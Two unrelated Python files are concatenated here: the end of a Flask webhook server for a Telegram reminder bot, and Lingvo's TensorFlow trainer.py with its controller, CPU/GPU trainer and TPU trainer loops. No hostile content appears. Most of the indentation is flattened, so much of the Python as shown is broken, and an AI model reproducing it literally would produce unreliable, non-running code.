limitations under the License.
'''
# stdlib imports
from __future__ import print_function
import logging
import threading
from datetime import datetime
# third-party libraries
from flask import Flask, request
# application imports
import olivaw.tasks as tasks
import olivaw.telegram as telegram
from olivaw.settings import secrets
from olivaw.schedule import Scheduler
# pylint: disable=I0011,invalid-name
app = Flask(__name__.split('.')[0])
scheduler = Scheduler()
@app.before_first_request
def init():
"""initialize the server"""
sched_thread = threading.Thread(target=scheduler.run)
sched_thread.daemon = True
sched_thread.start()
@app.route('/')
def hello():
"""Handle Unknown Routes."""
print("/ | hit.")
url = 'http://telegram.me/%s' % (secrets["telegram.bot_name"])
return 'Nothing to see here. <a href="%s">%s</a>' % (url, url)
@app.route(secrets['telegram.webhook_path'], methods=['GET', 'POST'])
def telegram_webhook():
"""handle telegram webhook hits"""
print('telegram_webhook | data: %s'%(request.data))
json = request.get_json(force=True, silent=True)
if not json:
return ''
print("telegram_webhook | json: %s"%(json))
update = telegram.Update(json)
if not update.message or not update.message.text:
return ''
msg = update.message
is_reminder_request, job, reply = tasks.parse_reminder(msg)
print("reminder: ", is_reminder_request, job, reply)
if is_reminder_request:
start_time = datetime.utcfromtimestamp(int(job["timestamp"]))
scheduler.add_job(start_time, job)
telegram.send_reply(secrets['telegram.bot_key'], msg, reply)
return ''
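# For local testing (illustrative only; field values are invented), a minimal
# Telegram update that makes it past the message/text checks above and into
# tasks.parse_reminder() looks roughly like:
#
#   {"update_id": 1,
#    "message": {"message_id": 1,
#                "from": {"id": 42, "first_name": "Ada"},
#                "chat": {"id": 42, "type": "private"},
#                "date": 1480000000,
#                "text": "remind me in 10 minutes to stretch"}}
#
# Updates without message.text are acknowledged with an empty 200 response.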
@app.errorhandler(500)
def server_error(e):
"""500 error page handler"""
logging.exception('An error occurred during a request.')
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
def main():
"""entry point for server"""
try:
telegram.set_webhook(secrets["telegram.bot_key"], secrets["telegram.webhook_address"])
    except Exception:
        logging.exception('An error occurred when setting the webhook.')
# This is used when running locally. Gunicorn is used to run the
# application on Google App Engine. See entrypoint in app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
if __name__ == '__main__':
main()
|
trainer.py
|
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=line-too-long
"""Trainer.
To run locally:
.. code-block:: bash
$ bazel build -c opt //lingvo:trainer
$ bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 \
--run_locally=cpu
To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`.
"""
# pylint: enable=line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import os
import re
import threading
import time
from lingvo import base_trial
from lingvo import executor
from lingvo import model_registry
import lingvo.compat as tf
from lingvo.core import base_model
from lingvo.core import base_model_params
from lingvo.core import checkpointer
from lingvo.core import cluster_factory
from lingvo.core import inference_graph_exporter
from lingvo.core import metrics
from lingvo.core import py_utils
import numpy as np
import six
from six.moves import range
from six.moves import zip
from lingvo import base_runner
# pylint:disable=g-direct-tensorflow-import
from tensorflow.python.tpu import device_assignment as device_assignment_lib
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop as tpu_training_loop
from tensorflow.python.tpu.ops import tpu_ops
# pylint:enable=g-direct-tensorflow-import
tf.flags.DEFINE_string(
'model', '', 'Name of the model class to train.'
'Must be a model defined in the model_registry.')
tf.flags.DEFINE_string(
'model_task_name', '', 'For multitask models: '
'select task to train/evaluate/decode. '
'Empty means to sample a task (training only).')
tf.flags.DEFINE_string('logdir', '', 'Log directory.')
tf.flags.DEFINE_bool(
'interactive', False,
'If True, enter interactive IPython for the controller job.')
tf.flags.DEFINE_string(
'run_locally', '',
'Can be empty, cpu, or gpu. If not empty, ignores cluster configuration '
'flags and runs controller and trainer in a single local process.')
tf.flags.DEFINE_string('tf_master', '', 'TF runtime.')
tf.flags.DEFINE_string(
'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. '
'The dict is specified as: job=host1:port1,host2:port2,'
'host3:port3@job2=host3:port4,...')
tf.flags.DEFINE_string(
'mode', 'async', 'How this trainer binary is used. '
'async: used in an async training setup; '
'sync: used in a sync training setup; '
'shell: an interactive shell for development; '
'inspect_evaler: print evaler dataset names; '
'inspect_decoder: print decoder dataset names; '
'write_inference_graph: write inference graphs to logdir.')
tf.flags.DEFINE_string('job', '', 'trainer/controller/eval, etc.')
tf.flags.DEFINE_integer('task', 0, 'Task id within the job.')
tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.')
tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.')
tf.flags.DEFINE_string('worker_job', '/job:trainer', 'Job name.')
tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_integer('worker_tpus', 0, 'Number of tpus to use per replica.')
tf.flags.DEFINE_integer('worker_num_tpu_hosts', 0, 'Number of tpu hosts.')
tf.flags.DEFINE_integer('worker_split_size', 1,
'Number of devices for one split.')
tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name')
tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('input_job', '/job:input', 'Job name')
tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_string(
'input_targets', '', 'Target network addresses for the '
'input job. E.g., a single ip:port, or a list of '
'comma-separated grpc://ip:port, etc.')
tf.flags.DEFINE_string('evaler_job', '/job:evaler', 'Job name')
tf.flags.DEFINE_integer('evaler_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('evaler_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('decoder_job', '/job:decoder', 'Job name')
tf.flags.DEFINE_integer('decoder_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('decoder_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_bool(
'evaler_in_same_address_as_controller', False,
'Whether or not evaler is in the same address space as '
    'controller. This flag is meant for unittest only.')
tf.flags.DEFINE_string(
'vizier_reporting_job', 'evaler',
    'Job responsible for reporting metrics. This specifies a '
'job prefix, evaler will match all evaler jobs, while '
'evaler_dev and decoder_dev will only match the corresponding '
'jobs that are on the dev set.')
tf.flags.DEFINE_integer(
'enqueue_max_steps', None, 'Max enqueue steps. -1 meaning no limit.'
' This flag should be set for unit-test only.')
tf.flags.DEFINE_integer('saver_max_to_keep', None,
'Maximum number of recent checkpoints to keep.')
tf.flags.DEFINE_float('saver_keep_checkpoint_every_n_hours', None,
'How often to keep a checkpoint.')
tf.flags.DEFINE_bool(
'checkpoint_in_trainer_tpu', False,
'Whether to enable checkpointing in TrainerTpu, allowing for '
    'operation without a separate Controller task. '
'TODO(b/137871213) migrate file/summaries from Controller.')
tf.flags.DEFINE_string(
'tpu', None,
'The Cloud TPU on GCP to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url. If set, other cluster parameters (such as --cluster_spec) will be '
'configured automatically with TPUClusterResolver.')
tf.flags.DEFINE_string(
'gcp_project', None,
'Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
tf.flags.DEFINE_string(
'tpu_zone', None,
    'GCE zone where the Cloud TPU is located. If not specified, we '
    'will attempt to automatically detect the zone from metadata.')
# Please consider adding model params instead of adding flags.
FLAGS = tf.flags.FLAGS
# Map from split size to computation_shape for TPU model parallelism.
SUPPORTED_SPLIT_SIZE = {
1: [1, 1, 1],
2: [1, 1, 2],
4: [1, 2, 2],
8: [2, 2, 2],
16: [4, 2, 2],
32: [4, 4, 2],
64: [4, 8, 2],
128: [8, 8, 2]
}
def ComputationShape(split_size):
"""Decides the computation shape based on the split_size."""
  assert split_size in SUPPORTED_SPLIT_SIZE, (
      'Model parallelism with %d devices is currently not supported.' %
      split_size)
return SUPPORTED_SPLIT_SIZE[split_size]
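# Illustrative only (not part of the original trainer): the table above maps a
# worker_split_size of 8 to a 2 x 2 x 2 TPU computation shape.
def _ExampleComputationShape():
  assert ComputationShape(8) == [2, 2, 2]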
# useful for debugging.
def _StartShell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython # pylint: disable=g-import-not-at-top
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def _ModelAnalysis(model):
"""Returns a text showing variable sizes and their total size."""
class Analyzer(object):
def __init__(self):
self._seen_var = {}
self.total = 0
def __call__(self, v):
assert isinstance(v, tf.Variable)
# pylint: disable=protected-access
if not v.shape.is_fully_defined():
# Only Cudnn RNN params lack static shapes.
if hasattr(v, 'approx_size'):
size = v.approx_size
else:
return '%-20s %10s %s' % (v.shape, 'n/a', v._shared_name)
else:
size = v.shape.num_elements()
if v._shared_name not in self._seen_var:
self._seen_var[v._shared_name] = size
self.total += size
return '%-20s %10d %s' % (v.shape, size, v._shared_name)
analyzer = Analyzer()
output = '\n'
output += model.vars.Transform(analyzer).DebugString()
output += '\n'
output += '=' * 100
output += '\ntotal #params: %10d\n' % (analyzer.total)
return output, analyzer.total
class Controller(base_runner.BaseRunner):
"""Controller for a training cluster."""
def __init__(self, *args, **kwargs):
super(Controller, self).__init__(*args, **kwargs)
assert not self._model_task_name, 'Controller needs all tasks!'
tf.gfile.MakeDirs(self._train_dir)
self._control_dir = os.path.join(self._logdir, 'control')
tf.gfile.MakeDirs(self._control_dir)
self._summary_writer = self._CreateSummaryWriter(self._control_dir)
self._time_steps = [] # A short history of (timestamp, global_step)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._summary_op = tf.summary.merge_all()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
self.checkpointer = self._CreateCheckpointer(self._train_dir,
self._model)
self._ExportMetrics(params=self.params)
self._model_analysis, self._total_num_params = _ModelAnalysis(self._model)
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._control_dir,
'model_analysis.txt')
self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
tf.train.write_graph(self._graph.as_graph_def(), self._control_dir,
'train.pbtxt')
def _CreateCheckpointer(self, train_dir, model):
"""Wrapper method for override purposes."""
return checkpointer.Checkpointer(train_dir, model)
def Start(self):
self._RunLoop('controller', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _Loop(self):
self._summary_writer.add_graph(self._graph)
with tf.container(self._container_id), self._GetSession() as sess:
gsteps = py_utils.GetGlobalStep()
examples = self._model.total_examples
if FLAGS.interactive:
# Into interactive debugging mode.
_StartShell(locals())
return
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
# TODO(zhifengc): Moves these options into params.
tp = self.params.train
summary_interval_steps = tp.summary_interval_steps
save_interval_seconds = tp.save_interval_seconds
next_summary_step = 1
while True:
now = time.time()
next_iteration_seconds = now + min(
10, save_interval_seconds) # 10 seconds or less
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
global_step, total_examples = sess.run([gsteps, examples])
step_rate, example_rate = self._RecordStepRate(global_step,
total_examples)
if self._trial.ShouldStop() or self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
self.checkpointer.Save(sess, global_step)
# Close all the queues so the enqueue threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
sess.close()
return
# Checkpoint if it's time.
self.checkpointer.MaybeSave(sess, gsteps)
# Summary.
if self._summary_op is not None and global_step >= next_summary_step:
tf.logging.info('Write summary @%s', global_step)
summary_str = sess.run(self._summary_op)
if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
tf.logging.info('Skipping summary: %s', summary_str)
else:
self._summary_writer.add_summary(summary_str, global_step)
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
next_summary_step = global_step + summary_interval_steps
tf.logging.info('Write summary done: step %d', global_step)
self._SetStatusMessage(
'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' %
(global_step, step_rate, example_rate))
self._ExportMetrics(
global_step=global_step,
step_rate=step_rate,
example_rate=example_rate)
now = time.time()
if now < next_iteration_seconds:
time.sleep(next_iteration_seconds - now)
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _RecordStepRate(self, current_steps, total_examples):
"""Computes the overall step rate and adds a summary."""
self._time_steps.append((time.time(), current_steps, total_examples))
    # Keeps a relatively long history to compute a smooth steps/second.
# Removes duplicate stats for step = 0 to get rid of the warm-up period.
while (self._time_steps[-1][1] - self._time_steps[0][1] > 10000 or
(len(self._time_steps) > 1 and
self._time_steps[0][1] == self._time_steps[1][1])):
del self._time_steps[0]
(t0, s0, e0), (t1, s1, e1) = self._time_steps[0], self._time_steps[-1]
rate = 0.0
example_rate = 0.0
if t1 > t0 + 1:
elapsed_secs = t1 - t0
rate = (s1 - s0) / elapsed_secs
example_rate = (e1 - e0) / elapsed_secs
tf.logging.info('Steps/second: %f, Examples/second: %f', rate, example_rate)
self._SummarizeValue(current_steps, 'global_step/sec', rate)
self._SummarizeValue(current_steps, 'examples/sec', example_rate)
return rate, example_rate
class Trainer(base_runner.BaseRunner):
"""Trainer on non-TPU."""
def __init__(self, *args, **kwargs):
super(Trainer, self).__init__(*args, **kwargs)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
try:
self._task_probs_summary_writers = []
for task in self._model.task_schedule.tasks:
path = os.path.join(os.path.join(self._train_dir, task))
tf.gfile.MakeDirs(path)
self._task_probs_summary_writers.append(self._CreateSummaryWriter(path))
except AttributeError:
tf.logging.info('AttributeError. Expected for single task models.')
self._task_probs_summary_writers = []
# Saves the graph def.
if self.params.cluster.task > 0:
self._summary_writer = None
else:
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
worker_id = self.params.cluster.task
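    # Stagger worker start-up: worker k waits for k * (k + 1) / 2 *
    # start_up_delay_steps global steps before it starts training (this is
    # enforced by _WaitTillInit in _Loop below).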
self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) *
self.params.train.start_up_delay_steps)
def _SummarizeValue(self, steps, tag, value, writer):
if writer:
writer.add_summary(metrics.CreateScalarSummary(tag, value), steps)
def Start(self):
self._RunLoop('trainer', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
return super(Trainer, self)._LoopEnqueue(op)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
global_step = None
@py_utils.Retry(retry_value=(tf.errors.FailedPreconditionError,))
def _WaitTillInit():
"""Wait until the model is ready."""
try:
global_step = sess.run(py_utils.GetGlobalStep())
except tf.errors.FailedPreconditionError as e:
tf.logging.info('Probably the expected race on global_step: %s', e)
raise
msg = 'step:%6d' % global_step
self._SetStatusMessage(msg)
if global_step < self._start_up_delay_steps:
msg = 'global step (%d) has not reached start up delay steps (%d)' % (
global_step, self._start_up_delay_steps)
tf.logging.info('%s', msg)
raise tf.errors.FailedPreconditionError(
node_def=None, op=None, message=msg)
return global_step
global_step = _WaitTillInit()
status_interval_steps = 100
next_status_step = 1
eval_metrics = None
while True:
if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or
self._ShouldStop(sess, global_step)):
tf.logging.info('Training finished.')
          # Close all the queues so the enqueue threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
if self._early_stop:
time.sleep(300) # controller hangs if it doesn't finish first
return
# If a task is explicitly specified, only train that task.
if self._model_task_name:
model_task = self._model.GetTask(self._model_task_name)
else:
# Note: This is a slightly stale global_step value from the previous
# sess.run() call.
# For multi-task models, `self._model.task_schedule.cur_probs` will
# be updated.
model_task = self._model.SampleTask(global_step)
if self._task_probs_summary_writers:
for index, prob in enumerate(self._model.task_schedule.cur_probs):
self._SummarizeValue(global_step, 'task_probability', prob,
self._task_probs_summary_writers[index])
try:
for index, task in enumerate(self._model.tasks):
self._SummarizeValue(global_step, 'task_weight',
sess.run(task.vars.task_weight),
self._task_probs_summary_writers[index])
except AttributeError:
pass
_, global_step, eval_metrics, per_example_tensors = sess.run([
model_task.train_op,
py_utils.GetGlobalStep(),
model_task.eval_metrics,
model_task.per_example_tensors,
])
msg = 'step:%6d' % global_step
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val, self._summary_writer)
model_task.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
if global_step >= next_status_step:
self._SetStatusMessage(msg)
next_status_step = global_step + status_interval_steps
else:
tf.logging.info(msg)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super(TrainerTpu, self).__init__(*args, **kwargs)
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
if self._cluster.params.worker.targets:
self._cluster_def = tf.train.ClusterSpec({
'worker': self._cluster.params.worker.targets.split(',')
}).as_cluster_def()
else:
self._cluster_def = None
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitTillInit():
"""Wait until the model is ready."""
try:
# tpu.initialize_system() is called with None as embedding_config, as
# embedding_config is not available yet. Later in _Loop, it is called
# with the correct embedding_config. Since it cannot be called twice in
# the same graph with different embedding_config, we use a dummy_graph
# here.
dummy_graph = tf.Graph()
with dummy_graph.as_default():
tpu_initialize_system_op = tf.tpu.initialize_system(
embedding_config=None, job=None)
with self._GetSession(graph=dummy_graph) as sess:
topology = sess.run(tpu_initialize_system_op)
device_assignment = device_assignment_lib.device_assignment(
topology,
computation_shape=ComputationShape(num_devices_per_split),
num_replicas=data_parallelism)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitTillInit()
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.job_spec.name):
self._eval_metrics = metrics.TpuEvalMetrics()
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model = self.params.Instantiate()
self._load_ops = tf.get_collection(py_utils.TPU_EMBEDDING_LOAD_OPS)
self._retrieve_ops = tf.get_collection(
py_utils.TPU_EMBEDDING_RETRIEVE_OPS)
tpu_embedding_collection = tf.get_collection(py_utils.TPU_EMBEDDING)
self._tpu_embedding = (
tpu_embedding_collection[0] if tpu_embedding_collection else None)
self._model.ConstructFPropBPropGraph()
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._model.GetTask().eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(
self._model.GetTask().per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._model.GetTask().train_op]
@tpu_function.on_device_training_loop
def TpuTrain():
loop_result = tpu_training_loop.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
batch_parallel_res = tf.tpu.batch_parallel(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._model.GetTask().per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
        # Get metric result from a single replica; they are all the same here.
self._tpu_train_ops = [[t[0] for t in batch_parallel_res],
outfeed_dequeue_op]
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer = checkpointer.Checkpointer(self._train_dir,
self._model)
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
# Saves the graph def.
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
def _GetSession(self, **kwargs):
return super(TrainerTpu, self)._GetSession(
cluster_def=self._cluster_def, **kwargs)
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tpu_ops.outfeed_enqueue_tuple(per_example_tensors.Flatten())
def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
"""Process all per-example tensor outfeed data for a TPU sess.run.
Args:
per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
num_devices: number of TPU cores assigned to this process.
Returns:
A dict of per-example tensors from the latest TpuTrainStep.
"""
if not per_example_tensors:
return tf.no_op()
tensor_shapes = [
py_utils.GetShape(per_example_tensors[key])
for key in sorted(per_example_tensors)
]
tensor_types = [
tf.as_dtype(per_example_tensors[key].dtype)
for key in sorted(per_example_tensors)
]
def LoopBody(i, *input_arrays):
"""Process outfeed data for a single TpuTrainStep.
Args:
i: current loop index.
*input_arrays: One tf.TensorArray per outfeed tensor.
Returns:
i+1 (new index) plus post-write tf.TensorArray handles.
"""
# Outfeed ops execute on each JF node, so they must be located on the
# nodes.
outfeed_devices = []
device_assignment = py_utils.GetTpuDeviceAssignment()
assert device_assignment
for replica in range(device_assignment.num_replicas):
for core in range(device_assignment.num_cores_per_replica):
with tf.device(device_assignment.host_device(replica, core)):
outfeed_devices.append(
tpu_ops.outfeed_dequeue_tuple(
tensor_types,
tensor_shapes,
device_ordinal=device_assignment.tpu_ordinal(replica,
core)))
offset = i * num_devices
output_arrays = list(input_arrays)
# Each output_array holds a different per-example tensor. We get results
# for each tensor from each TPU for each TpuTrainStep call.
for j in range(len(output_arrays)):
for k in range(len(outfeed_devices)):
output_arrays[j] = output_arrays[j].write(offset + k,
outfeed_devices[k][j])
return tuple([i + 1] + output_arrays)
def LoopCond(i, *output_arrays):
del output_arrays
return i < num_loops
output_arrays = [
tf.TensorArray(
tensor_types[i],
size=num_loops * num_devices,
element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes))
]
# Loop once for each time that TpuTrainStep runs.
output_arrays = tf.while_loop(
LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
concatenated_arrays = [array.concat() for array in output_arrays]
return dict(zip(sorted(per_example_tensors), concatenated_arrays))
def Start(self):
# Run training.
self._RunLoop('trainer', self._Loop)
def _InfeedLoop(self, sess):
tf.logging.info('_InfeedLoop start')
for _ in range(self._steps_per_loop):
sess.run(self.enqueue_ops)
def StartEnqueueOp(self, op):
    # When retrieve ops for TPU embedding are present, we use _InfeedLoop above
    # instead to make sure enqueue and retrieve do not happen at the same
    # time, as required by TPU embedding.
    # We can remove this by using a tf.while_loop-driven infeed op.
if self._retrieve_ops:
return
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
# Wait for _Loop to initialize variables first before attempting to infeed.
self._initialized.wait()
# The global step may not be initialized in this thread if the target server
# uses session state isolation (e.g. Cloud TPUs).
sess = self._GetSession()
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.RestoreGlobalStepIfNeeded(sess)
return super(TrainerTpu, self)._LoopEnqueue(op, sess)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
config_proto = (
self._tpu_embedding.config_proto
if self._tpu_embedding is not None else None)
sess.run(
tf.tpu.initialize_system(embedding_config=config_proto, job=None))
sess.run(self.initialize_tables)
sess.run(self._initialize_local_vars)
if FLAGS.run_locally == 'tpu':
sess.run(tf.global_variables_initializer())
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.RestoreIfNeeded(sess)
gsteps = py_utils.GetGlobalStep()
global_step = sess.run(gsteps)
self._initialized.set()
eval_metrics = None
sess.run(self._load_ops)
while True:
if FLAGS.checkpoint_in_trainer_tpu:
# Init/restore variable if needed.
self.checkpointer.RestoreIfNeeded(sess)
if self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics):
# Early terminate gracefully by setting a new max step horizon: three
# more TPU steps to ensure that the enqueue ops can gracefully
# terminate as well.
if self._max_steps is None:
self._max_steps = global_step + 3 * self._steps_per_loop
tf.logging.info('Early stopping at step: %d', self._max_steps)
if self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
return
if self._retrieve_ops:
infeed_loop_thread = threading.Thread(
target=self._InfeedLoop, args=(sess,))
infeed_loop_thread.start()
values, outfeeds = sess.run(self._tpu_train_ops)
if self._retrieve_ops:
infeed_loop_thread.join()
tf.logging.info('Retrieve params.')
sess.run(self._retrieve_ops)
tf.logging.info('Retrieve params done.')
eval_metrics = self._eval_metrics.PackMetricsValues(values)
# Note: global_step is incremented by self._steps_per_loop by the
# previous sess.run call.
global_step = sess.run(gsteps)
msg = 'step:%6d' % global_step
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
self._SetStatusMessage(msg)
task = self._model.GetTask()
if not task.per_example_tensors:
outfeeds = {}
task.ProcessFPropResults(sess, global_step, eval_metrics, outfeeds)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
outfeeds)
if FLAGS.checkpoint_in_trainer_tpu:
self.checkpointer.MaybeSave(sess, gsteps)
def _GetSpecificCheckpoint(load_checkpoint_from):
"""Returns a specific checkpoint given `load_checkpoint_from`.
When load_checkpoint_from is a directory, we find the latest
checkpoint in the directory and use that as the checkpoint
to evaluate.
When load_checkpoint_from is a specific checkpoint, we
validate the path and return it.
Args:
load_checkpoint_from: If not None, specifies the directory or specific
checkpoint to load. If a directory, the latest checkpoint in the
directory will be used.
"""
if not load_checkpoint_from:
# No location specified, use existing train_dir.
return None
# If load_checkpoint_from is a directory, return the latest
# checkpoint in the directory.
if tf.io.gfile.isdir(load_checkpoint_from):
return tf.train.latest_checkpoint(load_checkpoint_from)
# We assume that load_checkpoint_from is a specific checkpoint to
# evaluate since it is not a directory.
#
# Check validity of eval path by looking for the index file.
if tf.io.gfile.exists(load_checkpoint_from + '.index'):
return load_checkpoint_from
# Fail if we see an unexpected load_checkpoint_from.
#
# This might happen if load_checkpoint_from refers to a checkpoint
# but the index file cannot be found.
raise ValueError('Invalid load_checkpoint_from: %s' % load_checkpoint_from)
